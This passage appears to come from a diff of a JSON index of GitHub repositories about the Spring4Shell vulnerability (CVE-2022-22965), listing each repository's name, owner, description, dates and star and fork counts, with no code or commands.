"https:\/\/avatars.githubusercontent.com\/u\/13015101?v=4", + "html_url": "https:\/\/github.com\/snicoll-scratches", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snicoll-scratches\/spring-boot-cve-2022-22965", + "description": "Showcase of overridding the Spring Framework version in older Spring Boot versions", + "fork": false, + "created_at": "2022-04-01T06:16:20Z", + "updated_at": "2022-04-01T06:44:44Z", + "pushed_at": "2022-04-13T14:45:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476606565, + "name": "CVE-2022-22965", + "full_name": "nu0l\/CVE-2022-22965", + "owner": { + "login": "nu0l", + "id": 54735907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54735907?v=4", + "html_url": "https:\/\/github.com\/nu0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nu0l\/CVE-2022-22965", + "description": "Spring-0day\/CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T06:50:21Z", + "updated_at": "2024-08-12T20:22:03Z", + "pushed_at": "2022-04-08T04:24:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476626448, + "name": "CVE-2022-22965-Spring-Core-Rce", + "full_name": "tangxiaofeng7\/CVE-2022-22965-Spring-Core-Rce", + "owner": { + "login": "tangxiaofeng7", + "id": 45926593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4", + "html_url": "https:\/\/github.com\/tangxiaofeng7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2022-22965-Spring-Core-Rce", + "description": "批量无损检测CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T07:55:26Z", + "updated_at": "2024-11-16T19:51:09Z", + "pushed_at": "2022-04-01T08:44:19Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 37, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476671454, + "name": "CVE-2022-22965", + "full_name": "helsecert\/CVE-2022-22965", + "owner": { + "login": "helsecert", + "id": 2202200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202200?v=4", + "html_url": "https:\/\/github.com\/helsecert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/helsecert\/CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-01T10:16:24Z", + "updated_at": "2022-04-05T10:07:48Z", + "pushed_at": "2022-04-04T11:27:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 476681722, + "name": "CVE-2022-22965", + "full_name": "lcarea\/CVE-2022-22965", + "owner": { + "login": "lcarea", + "id": 59819921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59819921?v=4", + "html_url": "https:\/\/github.com\/lcarea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lcarea\/CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-01T10:51:05Z", + "updated_at": "2023-11-18T22:46:48Z", + "pushed_at": "2022-04-01T11:19:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476708454, + "name": "CVE-2022-22965", + "full_name": "Joe1sn\/CVE-2022-22965", + "owner": { + "login": "Joe1sn", + "id": 37005640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37005640?v=4", + "html_url": "https:\/\/github.com\/Joe1sn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Joe1sn\/CVE-2022-22965", + "description": "CVE-2022-22965 Environment", + "fork": false, + "created_at": "2022-04-01T12:18:29Z", + "updated_at": "2022-04-02T02:08:46Z", + "pushed_at": "2022-04-02T09:50:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476714401, + "name": "CVE-2022-22965", + "full_name": "zer0yu\/CVE-2022-22965", + "owner": { + "login": "zer0yu", + "id": 16551733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16551733?v=4", + "html_url": "https:\/\/github.com\/zer0yu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0yu\/CVE-2022-22965", + "description": "Spring4Shell (CVE-2022-22965)", + "fork": false, + "created_at": "2022-04-01T12:37:32Z", + "updated_at": "2024-11-16T19:54:36Z", + "pushed_at": "2022-04-07T11:46:54Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 476734390, + "name": "CVE-2022-22965", + "full_name": "me2nuk\/CVE-2022-22965", + "owner": { + "login": "me2nuk", + "id": 57348147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57348147?v=4", + "html_url": "https:\/\/github.com\/me2nuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/me2nuk\/CVE-2022-22965", + "description": "Spring Framework RCE via Data Binding on JDK 9+ \/ spring4shell \/ CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T13:35:01Z", + "updated_at": "2024-08-12T20:22:03Z", + "pushed_at": "2022-04-04T01:16:41Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476738410, + "name": "spring-framework-rce", + "full_name": "wshon\/spring-framework-rce", + "owner": { + "login": "wshon", + "id": 16683806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16683806?v=4", + "html_url": "https:\/\/github.com\/wshon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wshon\/spring-framework-rce", + "description": "CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T13:46:55Z", + "updated_at": "2024-05-26T02:03:33Z", + "pushed_at": "2022-04-01T14:31:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476934750, + "name": "CVE-2022-22965", + "full_name": "Wrin9\/CVE-2022-22965", + "owner": { + "login": "Wrin9", + "id": 54984589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4", + "html_url": "https:\/\/github.com\/Wrin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrin9\/CVE-2022-22965", + "description": "CVE-2022-22965 POC", + "fork": false, + "created_at": "2022-04-02T03:17:48Z", + "updated_at": "2024-08-12T20:22:04Z", + "pushed_at": "2022-04-02T08:45:17Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477004407, + "name": "CVE-2022-22965_Spring_Core_RCE", + "full_name": "wjl110\/CVE-2022-22965_Spring_Core_RCE", + "owner": { + "login": "wjl110", + "id": 53851034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53851034?v=4", + "html_url": "https:\/\/github.com\/wjl110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wjl110\/CVE-2022-22965_Spring_Core_RCE", + "description": "CVE-2022-22965\\Spring-Core-RCE堪比关于 Apache Log4j2核弹级别漏洞exp的rce一键利用", + "fork": false, + "created_at": "2022-04-02T09:13:54Z", + "updated_at": "2024-08-12T20:22:05Z", + "pushed_at": "2022-04-02T10:14:11Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477155956, + "name": "cve-2022-22965", + "full_name": "mwojterski\/cve-2022-22965", + "owner": { + "login": "mwojterski", + "id": 474439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/474439?v=4", + "html_url": "https:\/\/github.com\/mwojterski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mwojterski\/cve-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-02T19:47:47Z", + "updated_at": "2022-10-15T13:39:43Z", + "pushed_at": "2022-04-02T20:23:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 477210316, + "name": "nmap-spring4shell", + "full_name": "gpiechnik2\/nmap-spring4shell", + "owner": { + "login": "gpiechnik2", + "id": 48253270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48253270?v=4", + "html_url": "https:\/\/github.com\/gpiechnik2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gpiechnik2\/nmap-spring4shell", + "description": "Nmap Spring4Shell NSE script for Spring Boot RCE (CVE-2022-22965) ", + "fork": false, + "created_at": "2022-04-03T01:27:28Z", + "updated_at": "2024-08-12T20:22:06Z", + "pushed_at": "2022-04-08T19:24:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "exploit", + "nmap", + "nmap-scripts", + "spring4shell", + "vulnerability" + ], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477260087, + "name": "CVE-2022-22965", + "full_name": "itsecurityco\/CVE-2022-22965", + "owner": { + "login": "itsecurityco", + "id": 1725054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1725054?v=4", + "html_url": "https:\/\/github.com\/itsecurityco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itsecurityco\/CVE-2022-22965", + "description": "Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5", + "fork": false, + "created_at": "2022-04-03T06:43:07Z", + "updated_at": "2024-10-23T04:53:18Z", + "pushed_at": "2022-04-03T08:38:30Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477654438, + "name": "Invoke-CVE-2022-22965-SafeCheck", + "full_name": "daniel0x00\/Invoke-CVE-2022-22965-SafeCheck", + "owner": { + "login": "daniel0x00", + "id": 6474092, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6474092?v=4", + "html_url": "https:\/\/github.com\/daniel0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daniel0x00\/Invoke-CVE-2022-22965-SafeCheck", + "description": "PowerShell port of CVE-2022-22965 vulnerability check by colincowie.", + "fork": false, + "created_at": "2022-04-04T10:37:27Z", + "updated_at": "2022-04-06T01:28:01Z", + "pushed_at": "2022-04-04T18:55:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "powershell", + "vulnerability-detection" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477716252, + "name": "spring4shell_victim", + "full_name": "fracturelabs\/spring4shell_victim", + "owner": { + "login": "fracturelabs", + "id": 38447921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38447921?v=4", + "html_url": "https:\/\/github.com\/fracturelabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fracturelabs\/spring4shell_victim", + "description": "Intentionally vulnerable Spring app to test CVE-2022-22965", + "fork": false, + "created_at": "2022-04-04T13:35:56Z", + "updated_at": "2022-11-09T18:15:40Z", + "pushed_at": "2022-04-07T03:56:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 477719633, + "name": "CVE-2022-22965-PoC", + "full_name": "sunnyvale-it\/CVE-2022-22965-PoC", + "owner": { + "login": "sunnyvale-it", + "id": 44291039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4", + "html_url": "https:\/\/github.com\/sunnyvale-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2022-22965-PoC", + "description": "CVE-2022-22965 (Spring4Shell) Proof of Concept", + "fork": false, + "created_at": "2022-04-04T13:44:39Z", + "updated_at": "2023-11-24T06:11:34Z", + "pushed_at": "2023-04-27T15:18:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-22965", + "cybersecurity", + "spring4shell", + "spring4shell-poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 477788509, + "name": "cve-2022-22965", + "full_name": "twseptian\/cve-2022-22965", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2022-22965", + "description": "Spring4Shell - CVE-2022-22965", + "fork": false, + "created_at": "2022-04-04T16:43:03Z", + "updated_at": "2022-06-03T05:02:36Z", + "pushed_at": "2022-04-04T16:54:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "spring-framework-vulnerability", + "spring4shell", + "spring4shell-poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477858835, + "name": "Spring4shell-CVE-2022-22965-POC", + "full_name": "netcode\/Spring4shell-CVE-2022-22965-POC", + "owner": { + "login": "netcode", + "id": 286371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/286371?v=4", + "html_url": "https:\/\/github.com\/netcode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netcode\/Spring4shell-CVE-2022-22965-POC", + "description": "Another spring4shell (Spring core RCE) POC", + "fork": false, + "created_at": "2022-04-04T20:16:06Z", + "updated_at": "2023-03-04T05:36:26Z", + "pushed_at": "2022-04-04T21:11:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477871854, + "name": "go-scan-spring", + "full_name": "fracturelabs\/go-scan-spring", + "owner": { + "login": "fracturelabs", + "id": 38447921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38447921?v=4", + "html_url": "https:\/\/github.com\/fracturelabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fracturelabs\/go-scan-spring", + "description": "Vulnerability scanner for Spring4Shell (CVE-2022-22965)", + "fork": false, + "created_at": "2022-04-04T21:01:26Z", + "updated_at": "2023-11-08T02:22:21Z", + "pushed_at": "2022-04-07T16:04:53Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 478060944, + "name": "spring-shell-vuln", + "full_name": "Snip3R69\/spring-shell-vuln", + "owner": { + "login": "Snip3R69", + "id": 76834257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76834257?v=4", + "html_url": "https:\/\/github.com\/Snip3R69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Snip3R69\/spring-shell-vuln", + "description": "Spring has Confirmed the RCE in Spring Framework. The team has just published the statement along with the mitigation guides for the issue. Now, this vulnerability can be tracked as CVE-2022-22965.", + "fork": false, + "created_at": "2022-04-05T09:35:41Z", + "updated_at": "2023-05-01T05:16:08Z", + "pushed_at": "2022-04-05T10:23:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478195147, + "name": "CVE-2022-22965", + "full_name": "luoqianlin\/CVE-2022-22965", + "owner": { + "login": "luoqianlin", + "id": 7350800, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7350800?v=4", + "html_url": "https:\/\/github.com\/luoqianlin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luoqianlin\/CVE-2022-22965", + "description": "Spring Framework RCE Exploit", + "fork": false, + "created_at": "2022-04-05T15:41:26Z", + "updated_at": "2022-04-05T15:59:01Z", + "pushed_at": "2022-04-05T15:58:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 478196909, + "name": "CVE-2022-22965", + "full_name": "0xrobiul\/CVE-2022-22965", + "owner": { + "login": "0xrobiul", + "id": 100078094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100078094?v=4", + "html_url": "https:\/\/github.com\/0xrobiul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xrobiul\/CVE-2022-22965", + "description": "Exploit Of Spring4Shell!", + "fork": false, + "created_at": "2022-04-05T15:45:47Z", + "updated_at": "2024-01-26T09:41:00Z", + "pushed_at": "2023-12-26T19:55:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478291981, + "name": "CVE-2022-22965_Spring4Shell", + "full_name": "LudovicPatho\/CVE-2022-22965_Spring4Shell", + "owner": { + "login": "LudovicPatho", + "id": 26960886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26960886?v=4", + "html_url": "https:\/\/github.com\/LudovicPatho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LudovicPatho\/CVE-2022-22965_Spring4Shell", + "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.", + "fork": false, + "created_at": "2022-04-05T20:34:36Z", + "updated_at": "2024-08-12T20:22:10Z", + "pushed_at": "2022-04-05T20:53:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 478371148, + "name": "irule-cve-2022-22965", + "full_name": "irgoncalves\/irule-cve-2022-22965", + "owner": { + "login": "irgoncalves", + "id": 23459099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23459099?v=4", + "html_url": "https:\/\/github.com\/irgoncalves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irgoncalves\/irule-cve-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-04-06T02:17:36Z", + "updated_at": "2023-02-11T20:16:21Z", + "pushed_at": "2022-04-06T20:15:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478399832, + "name": "spring-rec-demo", + "full_name": "datawiza-inc\/spring-rec-demo", + "owner": { + "login": "datawiza-inc", + "id": 57022507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57022507?v=4", + "html_url": "https:\/\/github.com\/datawiza-inc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/datawiza-inc\/spring-rec-demo", + "description": "The demo code showing the recent Spring4Shell RCE (CVE-2022-22965)", + "fork": false, + "created_at": "2022-04-06T04:17:51Z", + "updated_at": "2022-04-26T19:31:44Z", + "pushed_at": "2022-04-07T06:52:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478766830, + "name": "CVE-2022-22965", + "full_name": "alt3kx\/CVE-2022-22965", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2022-22965", + "description": "Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)", + "fork": false, + "created_at": "2022-04-07T00:08:16Z", + "updated_at": "2024-11-19T17:43:53Z", + "pushed_at": "2022-04-07T23:00:29Z", + "stargazers_count": 102, + "watchers_count": 102, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 102, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 478798941, + "name": "springboot_CVE-2022-22965", + "full_name": "wikiZ\/springboot_CVE-2022-22965", + "owner": { + "login": "wikiZ", + "id": 37897216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37897216?v=4", + "html_url": "https:\/\/github.com\/wikiZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wikiZ\/springboot_CVE-2022-22965", + "description": "CVE-2022-22965 pocsuite3 POC", + "fork": false, + "created_at": "2022-04-07T02:30:26Z", + "updated_at": "2023-04-11T11:56:18Z", + "pushed_at": "2022-04-07T02:31:28Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478817916, + "name": "spring4shell_behinder", + "full_name": "4nth0ny1130\/spring4shell_behinder", + "owner": { + "login": "4nth0ny1130", + "id": 73661290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73661290?v=4", + "html_url": "https:\/\/github.com\/4nth0ny1130", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4nth0ny1130\/spring4shell_behinder", + "description": "CVE-2022-22965写入冰蝎webshell脚本", + "fork": false, + "created_at": "2022-04-07T03:50:14Z", + "updated_at": "2024-03-12T08:31:12Z", + "pushed_at": "2022-05-10T03:54:23Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 65, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 478909815, + "name": "Spring4ShellPoC", + "full_name": "t3amj3ff\/Spring4ShellPoC", + "owner": { + "login": "t3amj3ff", + "id": 46841774, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46841774?v=4", + "html_url": "https:\/\/github.com\/t3amj3ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t3amj3ff\/Spring4ShellPoC", + "description": "Spring4Shell PoC (CVE-2022-22965)", + "fork": false, + "created_at": "2022-04-07T09:13:11Z", + "updated_at": "2022-04-07T09:21:07Z", + "pushed_at": "2022-04-08T09:21:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 479042800, + "name": "CVE-2022-22965-PoC_Payara", + "full_name": "CalumHutton\/CVE-2022-22965-PoC_Payara", + "owner": { + "login": "CalumHutton", + "id": 89394440, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89394440?v=4", + "html_url": "https:\/\/github.com\/CalumHutton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CalumHutton\/CVE-2022-22965-PoC_Payara", + "description": null, + "fork": false, + "created_at": "2022-04-07T15:26:15Z", + "updated_at": "2024-03-21T14:20:09Z", + "pushed_at": "2022-04-08T12:16:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 479655916, + "name": "CVE-2022-22965-susceptibility", + "full_name": "fransvanbuul\/CVE-2022-22965-susceptibility", + "owner": { + "login": "fransvanbuul", + "id": 4709666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4709666?v=4", + "html_url": "https:\/\/github.com\/fransvanbuul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fransvanbuul\/CVE-2022-22965-susceptibility", + "description": null, + "fork": false, + "created_at": "2022-04-09T07:45:08Z", + "updated_at": "2022-04-09T07:51:56Z", + "pushed_at": "2022-04-09T07:51:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 480192746, + "name": "Spring4Shell-CVE-2022-22965.py", + "full_name": "te5t321\/Spring4Shell-CVE-2022-22965.py", + "owner": { + "login": "te5t321", + "id": 65695117, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65695117?v=4", + "html_url": "https:\/\/github.com\/te5t321", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/te5t321\/Spring4Shell-CVE-2022-22965.py", + "description": "Script to check for Spring4Shell vulnerability", + "fork": false, + "created_at": "2022-04-11T01:55:53Z", + "updated_at": "2022-04-09T20:00:34Z", + "pushed_at": "2022-04-10T14:47:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 480373364, + "name": "Spring4Shell", + "full_name": "Loneyers\/Spring4Shell", + "owner": { + "login": "Loneyers", + "id": 29177120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29177120?v=4", + "html_url": "https:\/\/github.com\/Loneyers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Loneyers\/Spring4Shell", + "description": "Spring4Shell , Spring Framework RCE (CVE-2022-22965) , Burpsuite Plugin", + "fork": false, + "created_at": "2022-04-11T12:37:58Z", + "updated_at": "2024-08-12T20:22:19Z", + "pushed_at": "2022-04-11T12:39:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480857529, + "name": "CVE-2022-22965", + "full_name": "p1ckzi\/CVE-2022-22965", + "owner": { + "login": "p1ckzi", 